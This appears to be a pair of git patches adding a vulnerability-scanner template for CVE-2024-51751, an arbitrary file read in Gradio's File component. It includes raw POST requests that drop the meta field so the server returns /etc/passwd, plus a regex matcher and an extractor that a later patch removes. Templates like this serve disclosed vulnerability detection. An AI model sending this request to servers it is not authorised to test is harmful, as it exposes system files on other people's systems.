From c9fe61dd17cb2d4b8ec7fb1fa7889c23c6e12230 Mon Sep 17 00:00:00 2001 From: Yejune Ko <57734106+KoYejune0302@users.noreply.github.com> Date: Sat, 4 Jan 2025 14:19:24 +0900 Subject: [PATCH 1/2] Create CVE-2024-51751.yaml --- code/cves/2024/CVE-2024-51751.yaml | 86 ++++++++++++++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 code/cves/2024/CVE-2024-51751.yaml diff --git a/code/cves/2024/CVE-2024-51751.yaml b/code/cves/2024/CVE-2024-51751.yaml new file mode 100644 index 00000000000..603b26483c8 --- /dev/null +++ b/code/cves/2024/CVE-2024-51751.yaml @@ -0,0 +1,86 @@ +id: CVE-2024-51751 + +info: + name: Gradio File Component Arbitrary File Read + author: KoYejune0302, gy741 + severity: high + description: | + If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-51751 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-51751 + - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhm9-gp5p-5248 + tags: cve, cve2024, gradio, file-read + +http: + # Pre-condition check: Ensure the server returns {"error":null} for a valid request + - raw: + - | + POST /gradio_api/run/predict HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Content-Length: 245 + + { + "data": [ + { + "path": "/tmp/safe_file.txt", + "orig_name": "safe_file.txt", + "size": 4, + "mime_type": "text/plain", + "meta": { + "_type": "gradio.FileData" + } + } + ], + "event_data": null, + "fn_index": 0, + "trigger_id": 8, + "session_hash": "mnv42s5gt7" + } + + matchers: + - type: word + words: + - '{"error":null}' + part: body + + # Vulnerability check: Attempt to read /etc/passwd without the meta field + - raw: + - | + POST /gradio_api/run/predict HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Content-Length: 215 + + { + "data": [ + { + "path": "/etc/passwd", + "orig_name": "test.txt", + "size": 4, + "mime_type": "text/plain" + } + ], + "event_data": null, + "fn_index": 0, + "trigger_id": 8, + "session_hash": "mnv42s5gt7" + } + + matchers: + - type: regex + regex: + - 'root:.*:0:0:' + part: body + + extractors: + - type: regex + name: passwd_content + regex: + - 'root:.*:0:0:' + part: body + group: 1 From 2e126ef9afefdb863db9a8d0b32c9fb8b792fa72 Mon Sep 17 00:00:00 2001 From: Yejune Ko <57734106+KoYejune0302@users.noreply.github.com> Date: Sat, 4 Jan 2025 14:26:37 +0900 Subject: [PATCH 2/2] Update CVE-2024-51751.yaml --- code/cves/2024/CVE-2024-51751.yaml | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/code/cves/2024/CVE-2024-51751.yaml b/code/cves/2024/CVE-2024-51751.yaml index 603b26483c8..322fb04fdcb 100644 --- a/code/cves/2024/CVE-2024-51751.yaml +++ b/code/cves/2024/CVE-2024-51751.yaml @@ -3,7 +3,7 @@ id: CVE-2024-51751 info: name: Gradio File Component Arbitrary File Read author: KoYejune0302, gy741 - severity: high + severity: medium description: | If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server. classification: @@ -76,11 +76,3 @@ http: regex: - 'root:.*:0:0:' part: body - - extractors: - - type: regex - name: passwd_content - regex: - - 'root:.*:0:0:' - part: body - group: 1